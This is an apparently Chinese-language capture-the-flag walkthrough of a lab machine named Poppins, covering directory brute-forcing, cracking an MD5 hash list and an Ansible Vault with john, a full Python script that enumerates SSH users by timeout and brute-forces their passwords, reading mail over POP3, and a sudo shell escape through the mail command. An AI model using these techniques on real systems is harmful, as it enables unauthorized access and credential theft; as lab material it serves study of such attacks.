301      GET        9l       28w      378c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
[####################] - 14s    29910/29910   0s      found:34      errors:0      
[####################] - 1s       530/530     898/s   http://192.168.56.252/s/ 
[####################] - 1s       530/530     642/s   http://192.168.56.252/s/u/ 
[####################] - 1s       530/530     697/s   http://192.168.56.252/s/u/p/ 
[####################] - 1s       530/530     613/s   http://192.168.56.252/s/u/p/e/ 
[####################] - 1s       530/530     643/s   http://192.168.56.252/s/u/p/e/r/ 
[####################] - 1s       530/530     595/s   http://192.168.56.252/s/u/p/e/r/c/ 
[####################] - 1s       530/530     588/s   http://192.168.56.252/s/u/p/e/r/c/a/ 
[####################] - 1s       530/530     618/s   http://192.168.56.252/s/u/p/e/r/c/a/l/ 
[####################] - 1s       530/530     616/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/ 
[####################] - 1s       530/530     557/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/ 
[####################] - 1s       530/530     565/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/ 
[####################] - 1s       530/530     546/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/ 
[####################] - 2s       530/530     308/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/ 
[####################] - 2s       530/530     230/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/ 
[####################] - 2s       530/530     247/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/ 
[####################] - 3s       530/530     205/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/ 
[####################] - 2s       530/530     235/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/ 
[####################] - 2s       530/530     269/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/ 
[####################] - 2s       530/530     230/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/ 
[####################] - 2s       530/530     223/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/ 
[####################] - 3s       530/530     188/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/ 
[####################] - 3s       530/530     198/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/ 
[####################] - 3s       530/530     204/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/ 
[####################] - 3s       530/530     152/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/ 
[####################] - 4s       530/530     151/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/ 
[####################] - 1s       530/530     457/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/ 
[####################] - 1s       530/530     409/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/ 
[####################] - 1s       530/530     489/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/ 
[####################] - 1s       530/530     507/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/ 
[####################] - 1s       530/530     482/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/ 
[####################] - 1s       530/530     449/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/ 
[####################] - 1s       530/530     442/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/ 
[####################] - 1s       530/530     436/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/ 
[####################] - 1s       530/530     569/s   http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/                                                                                                                                                            

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# feroxbuster -u http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 7z,bak,pem,001,php,zip,txt,html,htm --scan-dir-listings  -C 503,404 --depth=99999 
                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s
 🚩  In-Scope Url          │ 192.168.56.252
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [503, 404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 📂  Scan Dir Listings     │ true
 💲  Extensions            │ [7z, bak, pem, 001, php, zip, txt, html, htm]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 99999
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      378c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
200      GET       60l      141w     1531c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
200      GET      100l      100w     3300c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/hash.bak
[####################] - 25m  2205800/2205800 0s      found:3       errors:0      
[####################] - 25m  2205460/2205460 1471/s  http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/      

在此不常见目录下发现hash.bak，john爆破一下。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.bak --wordlist=rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 100 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
kent12           (?)     
amotejoel        (?)     
sunjoo           (?)     
iydgmvin         (?)     
elised           (?)     
530223           (?)     
viking35         (?)     
naughtycat       (?)     
shadow626        (?)     
middelweg        (?)     
eloscar          (?)     
cash1407         (?)     
carlosmoya       (?)     
xytyx1972        (?)     
vanity17         (?)     
v0nowns.         (?)     
teadorohector    (?)     
taroh527         (?)     
susancliford     (?)     
suicida*02       (?)     
snoopymai12277++ (?)     
simpsonss        (?)     
short487         (?)     
sheelyka         (?)     
sexiestmonkey    (?)     
sanchezgenao     (?)     
s9136286d        (?)     
roldann          (?)     
rocktolife       (?)     
rebe11s          (?)     
o823o2           (?)     
nika1212         (?)     
nealmc           (?)     
mymiddlename     (?)     
mouses01         (?)     
mosuga1          (?)     
madeson4me       (?)     
lufkin3          (?)     
luckybear13      (?)     
loveyai054359503 (?)     
little_m         (?)     
lindilu          (?)     
lcisme69         (?)     
kmkm76           (?)     
kiezcute         (?)     
keyki            (?)     
kaleli1975       (?)     
justine145       (?)     
jojoisamuffin1   (?)     
jmac92777        (?)     
jennycane6       (?)     
ilovenickjerryjonas (?)     
igorlain         (?)     
hold40           (?)     
gnyja4           (?)     
gina5432         (?)     
foffbastards     (?)     
federal5         (?)     
eryt6587oi       (?)     
elogue           (?)     
ddm1203          (?)     
dazha            (?)     
dah3ss           (?)     
copperkiwi324    (?)     
cocian           (?)     
cesurcesur       (?)     
cannonballs      (?)     
boggsjr          (?)     
ben and leo      (?)     
baby0sita        (?)     
amp#88           (?)     
adiksapink       (?)     
actionlive       (?)     
Sammon           (?)     
McCain           (?)     
MENZOBERRANZAN   (?)     
MARIEC210        (?)     
Karis123456      (?)     
Dan2109<3        (?)     
Cusita74         (?)     
ARES29           (?)     
978645312N       (?)     
8153154          (?)     
7297163          (?)     
56371105         (?)     
5636378paulo     (?)     
33570654         (?)     
30procklisroad   (?)     
224466882468     (?)     
2173512          (?)     
21094572         (?)     
14212862         (?)     
113fox.13        (?)     
09202515339      (?)     
0869169575       (?)     
0866500130       (?)     
0865508166       (?)     
0848499262       (?)     
0831428854       (?)     
0800385914       (?)     
100g 0:00:00:00 DONE (2026-02-04 02:32) 158.7g/s 22035Kp/s 22035Kc/s 1161MC/s 0800436836..0800349428
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 
                                       

将其做成密码字典保存。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --show --format=Raw-MD5 hash.bak | cut -d: -f2 > cracked_passwords.txt

访问80端口，用cewl生成可能是用户名的字典文件。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cewl 192.168.56.252:80 | tr 'A-Z' 'a-z' > users.txt

尝试用hydra爆破，但无果，之后发现ssh的机制是存在用户才会提示输入密码，不存在则会直接返回Permission denied (publickey)。

用ai生成一份脚本爆破。

#!/usr/bin/env python3
import subprocess
import sys
import paramiko
import time
from colorama import Fore, Style, init

# 初始化颜色
init(autoreset=True)

# ======================
# 配置区域
# ======================
TARGET_IP = "192.168.56.252"
USER_LIST_FILE = "user.txt"
PASS_LIST_FILE = "cracked_passwords.txt"
SSH_PORT = 22
TIMEOUT_CHECK = 4  # 设置检测超时时间 (秒)
                   # 既然不存在用户是秒退，那么超过 4 秒还在挂着，说明就在等密码
# ======================

def read_lines(file_path):
    lines = []
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            for line in f:
                clean_line = line.strip()
                if clean_line and not clean_line.startswith("#"):
                    lines.append(clean_line)
    except FileNotFoundError:
        print(f"{Fore.RED}[!] 错误：文件 '{file_path}' 不存在！")
        sys.exit(1)
    return lines

def check_user_via_timeout(user):
    """
    逻辑核心（你的思路）：
    1. 执行 ssh user@ip
    2. 瞬间报错 publickey -> 用户不存在 -> 返回 False
    3. 运行超过 X 秒 (Timeout) -> 说明 SSH 正在等待输入密码 -> 用户存在 -> 返回 True
    """
    cmd = [
        "ssh", 
        "-p", str(SSH_PORT),
        "-o", "StrictHostKeyChecking=no", # 防止指纹确认卡住
        "-o", "BatchMode=no",             # 允许交互模式(为了让它挂起)
        f"{user}@{TARGET_IP}"
    ]

    try:
        # 尝试执行 SSH 命令
        # 我们不关心 stdout，只关心它是否超时
        subprocess.run(
            cmd,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.PIPE,       # 捕获 stderr 以检查 publickey 错误
            timeout=TIMEOUT_CHECK,        # 【核心】：设置强制超时
            encoding='utf-8'
        )
        
        # 如果代码走到了这里，说明 subprocess.run 在超时前结束了
        # 这通常意味着连接被拒绝，或者 publickey 错误导致立即退出
        return False

    except subprocess.TimeoutExpired:
        # 【重点】：如果触发了超时异常
        # 说明 SSH 进程一直挂着没退出（正在等待密码输入）
        # 结论：用户存在
        return True

    except Exception as e:
        print(f"{Fore.RED}[!] 系统调用错误: {e}")
        return False

def brute_force_paramiko(user, passwords):
    """
    对确认存在的用户，使用 Paramiko 进行稳定的密码爆破
    """
    print(f"{Fore.MAGENTA}[*] 锁定用户 '{user}'！开始爆破密码 ({len(passwords)} 个)...")
    
    for i, password in enumerate(passwords):
        # 进度条
        print(f"    [-] 尝试: {password} ({i+1}/{len(passwords)})", end="\r")
        
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(
                TARGET_IP, 
                port=SSH_PORT, 
                username=user, 
                password=password, 
                timeout=3,
                allow_agent=False, 
                look_for_keys=False
            )
            # 登录成功
            print(f"\n{Fore.GREEN}==========================================")
            print(f"{Fore.GREEN}[+] 爆破成功！！！")
            print(f"{Fore.GREEN}[+] 用户: {user}")
            print(f"{Fore.GREEN}[+] 密码: {password}")
            print(f"{Fore.GREEN}==========================================")
            client.close()
            return True
        except:
            client.close()
            pass
            
    print(f"\n{Fore.YELLOW}[-] 用户 '{user}' 密码未找到。")
    return False

def main():
    users = read_lines(USER_LIST_FILE)
    passwords = read_lines(PASS_LIST_FILE)

    print(f"{Fore.CYAN}[*] 启动混合扫描 - 目标: {TARGET_IP}")
    print(f"{Fore.CYAN}[*] 探测逻辑: Subprocess 超时判断 (超时=存在)")
    print(f"{Fore.CYAN}[*] 爆破逻辑: Paramiko")
    print("-" * 50)

    for user in users:
        # 简单的垃圾数据过滤
        if len(user) > 30 or " " in user: continue

        print(f"[*] 探测用户: {user:<20} ... ", end="")
        sys.stdout.flush()

        # 1. 使用 Subprocess + Timeout 判断用户是否存在
        exists = check_user_via_timeout(user)

        if exists:
            print(f"{Fore.GREEN}[有效] (连接超时/等待输入)")
            
            # 2. 如果存在，转交 Paramiko 跑字典
            if brute_force_paramiko(user, passwords):
                # 找到一个就退出吗？如果想继续找其他用户，注释掉下面这行
                # sys.exit(0)
                pass
        else:
            print(f"{Fore.RED}[跳过] (立即退出/Publickey)")

if __name__ == "__main__":
    main()

获得两个用户名jane，bert。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py 
[*] 启动混合扫描 - 目标: 192.168.56.252
[*] 探测逻辑: Subprocess 超时判断 (超时=存在)
[*] 爆破逻辑: Paramiko
--------------------------------------------------
[*] 探测用户: and                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: the                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: mary                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: poppins              ... [跳过] (立即退出/Publickey)
[*] 探测用户: banks                ... [跳过] (立即退出/Publickey)
[*] 探测用户: children             ... [跳过] (立即退出/Publickey)
[*] 探测用户: their                ... [跳过] (立即退出/Publickey)
[*] 探测用户: michael              ... [跳过] (立即退出/Publickey)
jane@192.168.56.252's password: [有效] (连接超时/等待输入)
[*] 锁定用户 'jane'！开始爆破密码 (101 个)...
    [-] 尝试: 100 password hashes cracked, 0 left (101/101)
[-] 用户 'jane' 密码未找到。
[*] 探测用户: with                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: family               ... [跳过] (立即退出/Publickey)
[*] 探测用户: magical              ... [跳过] (立即退出/Publickey)
[*] 探测用户: initially            ... [跳过] (立即退出/Publickey)
[*] 探测用户: joy                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: the                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: george               ... [跳过] (立即退出/Publickey)
[*] 探测用户: who                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: nanny                ... [跳过] (立即退出/Publickey)
[*] 探测用户: through              ... [跳过] (立即退出/Publickey)
[*] 探测用户: her                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: but                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: outings              ... [跳过] (立即退出/Publickey)
[*] 探测用户: enchanting           ... [跳过] (立即退出/Publickey)
[*] 探测用户: lessons              ... [跳过] (立即退出/Publickey)
[*] 探测用户: home                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: winifred             ... [跳过] (立即退出/Publickey)
[*] 探测用户: importance           ... [跳过] (立即退出/Publickey)
[*] 探测用户: life                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: friend               ... [跳过] (立即退出/Publickey)
bert@192.168.56.252's password: [有效] (连接超时/等待输入)
[*] 锁定用户 'bert'！开始爆破密码 (101 个)...
    [-] 尝试: jmac92777 (31/101)101)1/101)
==========================================
[+] 爆破成功！！！
[+] 用户: bert
[+] 密码: jmac92777
==========================================
[*] 探测用户: chimney              ... [跳过] (立即退出/Publickey)
[*] 探测用户: sweep                ... [跳过] (立即退出/Publickey)
[*] 探测用户: artist               ... [跳过] (立即退出/Publickey)
[*] 探测用户: for                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: arrives              ... [跳过] (立即退出/Publickey)
[*] 探测用户: brings               ... [跳过] (立即退出/Publickey)
[*] 探测用户: somewhat             ... [跳过] (立即退出/Publickey)
[*] 探测用户: strong               ... [跳过] (立即退出/Publickey)
[*] 探测用户: bond                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: learns               ... [跳过] (立即退出/Publickey)
[*] 探测用户: banker               ... [跳过] (立即退出/Publickey)
[*] 探测用户: stern                ... [跳过] (立即退出/Publickey)
[*] 探测用户: enjoys               ... [跳过] (立即退出/Publickey)
[*] 探测用户: disciplined          ... [跳过] (立即退出/Publickey)
[*] 探测用户: father               ... [跳过] (立即退出/Publickey)
[*] 探测用户: wisdom               ... [跳过] (立即退出/Publickey)
[*] 探测用户: fantastical          ... [跳过] (立即退出/Publickey)
[*] 探测用户: humor                ... [跳过] (立即退出/Publickey)
[*] 探测用户: providing            ... [跳过] (立即退出/Publickey)
[*] 探测用户: joins                ... [跳过] (立即退出/Publickey)
[*] 探测用户: often                ... [跳过] (立即退出/Publickey)
[*] 探测用户: close                ... [跳过] (立即退出/Publickey)
[*] 探测用户: street               ... [跳过] (立即退出/Publickey)
[*] 探测用户: multitalented        ... [跳过] (立即退出/Publickey)
[*] 探测用户: adventures           ... [跳过] (立即退出/Publickey)
[*] 探测用户: journeys             ... [跳过] (立即退出/Publickey)
[*] 探测用户: elder                ... [跳过] (立即退出/Publickey)
[*] 探测用户: joys                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: simple               ... [跳过] (立即退出/Publickey)
[*] 探测用户: appreciate           ... [跳过] (立即退出/Publickey)
[*] 探测用户: comes                ... [跳过] (立即退出/Publickey)
[*] 探测用户: skeptical            ... [跳过] (立即退出/Publickey)
[*] 探测用户: quickly              ... [跳过] (立即退出/Publickey)
[*] 探测用户: drawn                ... [跳过] (立即退出/Publickey)
[*] 探测用户: causes               ... [跳过] (立即退出/Publickey)
[*] 探测用户: social               ... [跳过] (立即退出/Publickey)
[*] 探测用户: into                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: world                ... [跳过] (立即退出/Publickey)
[*] 探测用户: preoccupied          ... [跳过] (立即退出/Publickey)
[*] 探测用户: mother               ... [跳过] (立即退出/Publickey)
[*] 探测用户: wife                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: younger              ... [跳过] (立即退出/Publickey)
[*] 探测用户: influence            ... [跳过] (立即退出/Publickey)
[*] 探测用户: curious              ... [跳过] (立即退出/Publickey)
[*] 探测用户: adventurous          ... [跳过] (立即退出/Publickey)
[*] 探测用户: forms                ... [跳过] (立即退出/Publickey)
[*] 探测用户: valuable             ... [跳过] (立即退出/Publickey)
[*] 探测用户: whimsical            ... [跳过] (立即退出/Publickey)
[*] 探测用户: through              ... [跳过] (立即退出/Publickey)
[*] 探测用户: adventure            ... [跳过] (立即退出/Publickey)
[*] 探测用户: magic                ... [跳过] (立即退出/Publickey)
[*] 探测用户: brand                ... [跳过] (立即退出/Publickey)
[*] 探测用户: unique               ... [跳过] (立即退出/Publickey)
[*] 探测用户: she                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: wind                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: east                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: carried              ... [跳过] (立即退出/Publickey)
[*] 探测用户: when                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: mischievous          ... [跳过] (立即退出/Publickey)
[*] 探测用户: need                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: london               ... [跳过] (立即退出/Publickey)
[*] 探测用户: century              ... [跳过] (立即退出/Publickey)
[*] 探测用户: turn                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: plot                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: movie                ... [跳过] (立即退出/Publickey)
[*] 探测用户: wonder               ... [跳过] (立即退出/Publickey)
[*] 探测用户: classic              ... [跳过] (立即退出/Publickey)
[*] 探测用户: timeless             ... [跳过] (立即退出/Publickey)
[*] 探测用户: them                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: teaching             ... [跳过] (立即退出/Publickey)
[*] 探测用户: care                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: she                  ... [跳过] (立即退出/Publickey)
[*] 探测用户: abilities            ... [跳过] (立即退出/Publickey)
[*] 探测用户: perfect              ... [跳过] (立即退出/Publickey)
[*] 探测用户: practically          ... [跳过] (立即退出/Publickey)
[*] 探测用户: happiness            ... [跳过] (立即退出/Publickey)
[*] 探测用户: bring                ... [跳过] (立即退出/Publickey)
[*] 探测用户: perspectives         ... [跳过] (立即退出/Publickey)
[*] 探测用户: challenge            ... [跳过] (立即退出/Publickey)
[*] 探测用户: that                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: escapades            ... [跳过] (立即退出/Publickey)
[*] 探测用户: unforgettable        ... [跳过] (立即退出/Publickey)
[*] 探测用户: leads                ... [跳过] (立即退出/Publickey)
[*] 探测用户: with                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: everyday             ... [跳过] (立即退出/Publickey)
[*] 探测用户: love                 ... [跳过] (立即退出/Publickey)
[*] 探测用户: rediscover           ... [跳过] (立即退出/Publickey)
[*] 探测用户: parents              ... [跳过] (立即退出/Publickey)
[*] 探测用户: helps                ... [跳过] (立即退出/Publickey)

用bert成功登录。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh bert@192.168.56.252
The authenticity of host '192.168.56.252 (192.168.56.252)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:9: [hashed name]
    ~/.ssh/known_hosts:10: [hashed name]
    ~/.ssh/known_hosts:12: [hashed name]
    ~/.ssh/known_hosts:16: [hashed name]
    ~/.ssh/known_hosts:17: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
    ~/.ssh/known_hosts:19: [hashed name]
    ~/.ssh/known_hosts:20: [hashed name]
    (25 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.252' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
bert@192.168.56.252's password: 
Linux Poppins 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
This account is currently not available.
Connection to 192.168.56.252 closed.

提示有邮件，想到之前的110端口。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc 192.168.56.252 110 
+OK Dovecot (Debian) ready.
user bert
+OK
pass jmac92777
+OK Logged in.
stat
+OK 1 1517
retr 1
+OK 1517 octets
Return-path: <jane@poppins>
Envelope-to: bert@poppins
Delivery-date: Fri, 29 Aug 2025 06:33:49 -0400
Received: from jane by Poppins with local (Exim 4.94.2)
        (envelope-from <jane@poppins>)
        id 1urwQW-0001RQ-CD
        for bert@poppins; Fri, 29 Aug 2025 06:33:48 -0400
To: bert@poppins
Subject: Urgent: Prod Server Credentials for Ansible Playbook
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1urwQW-0001RQ-CD@Poppins>
From: jane@poppins
Date: Fri, 29 Aug 2025 06:33:48 -0400

Hi Bert,

I've just finished the new Ansible playbook for the a-27 software deployment on our main production server, `web01.poppins.dsz`. It's ready to go.

The playbook contains some sensitive API keys, so I've encrypted the variables using Ansible Vault. You'll need to use the `ansible-vault decrypt` command to run it.

Here is the vault string you'll need to paste into the `secrets.yml` file.

```
$ANSIBLE_VAULT;1.1;AES256
66626631636362303332633238373338386634373434646532656534323230333938303331663630
3236333934663930343263363831353138323630393134320a366366393939373636386538336336
34353536656637313762323832643339633234656635326137633439303730373335386536306436
6335363366376634630a326563623737626337353436323565643365333061663661396337613731
3730
```
Let me know if you hit any issues. We need to get this deployed by EOD.

Thanks,
Jane
.
exit
-ERR Unknown command: EXIT
quit
+OK Logging out.

用john爆破

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim 1.vault 
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ansible2john 1.vault > tmp
                                                                                                                                                           
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john tmp --wordlist=rockyou.txt     
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
javiel           (1.vault)     
1g 0:00:00:29 DONE (2026-02-04 02:43) 0.03345g/s 2974p/s 2974c/s 2974C/s jojo95..janele
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ansible-vault view 1.vault
Vault password: 
cumibug

javiel是用户jane的密码。

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh jane@192.168.56.252
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
jane@192.168.56.252's password: 
Linux Poppins 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jane@Poppins:~$ ls
jane@Poppins:~$ ls /home
bert  jane  michael  winifred

cumibug是用户micheal的密码。

jane@Poppins:~$ su michael
Password: 
michael@Poppins:/home/jane$ cd ~
michael@Poppins:~$ ls
michael@Poppins:~$ ls -al
total 20
drwxr-xr-x 2 michael michael 4096 Aug 29 09:59 .
drwxr-xr-x 6 root    root    4096 Aug 29 06:13 ..
lrwxrwxrwx 1 root    root       9 Aug 29 09:59 .bash_history -> /dev/null
-rw-r--r-- 1 michael michael  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 michael michael 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 michael michael  807 Apr 18  2019 .profile
michael@Poppins:~$ cd /jane
bash: cd: /jane: No such file or directory
michael@Poppins:~$ cd /home/jane
michael@Poppins:/home/jane$ ls
michael@Poppins:/home/jane$ ls -al
total 20
drwxr-xr-x 2 jane jane 4096 Aug 29 11:45 .
drwxr-xr-x 6 root root 4096 Aug 29 06:13 ..
lrwxrwxrwx 1 root root    9 Aug 29 09:59 .bash_history -> /dev/null
-rw-r--r-- 1 jane jane  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 jane jane 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 jane jane  807 Apr 18  2019 .profile
michael@Poppins:/home/jane$ cd ..
michael@Poppins:/home$ sudo -l
[sudo] password for michael: 
Matching Defaults entries for michael on Poppins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on Poppins:
    (winifred) PASSWD: /usr/bin/mail *

用户michael可以以winifred的身份免密执行mail

由于mail版本太老，gtfobins提供的利用方法不可行。

只能先尝试自己发邮件，然后逃逸到shell里面。

mail 命令提供了一个交互式界面（TUI）。在交互模式下，输入 ! 加上命令（如 !/bin/sh）可以调用底层 Shell 执行外部命令。

michael@Poppins:/home$ sudo -u winifred /usr/bin/mail -s "test" winifred</dev/null
Null message body; hope that's ok
michael@Poppins:/home$ sudo -u winifred /usr/bin/mail
Mail version 8.1.2 01/15/2001.  Type ? for help.
"/var/mail/winifred": 1 message 1 new
>N  1 winifred@poppins   Wed Feb 04 02:50   18/558   test
& !/bin/bash
winifred@Poppins:/home$ ls
bert  jane  michael  winifred

winifred@Poppins:~$ sudo -l
Matching Defaults entries for winifred on Poppins:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User winifred may run the following commands on Poppins:
    (ALL) NOPASSWD: /usr/bin/ansible *
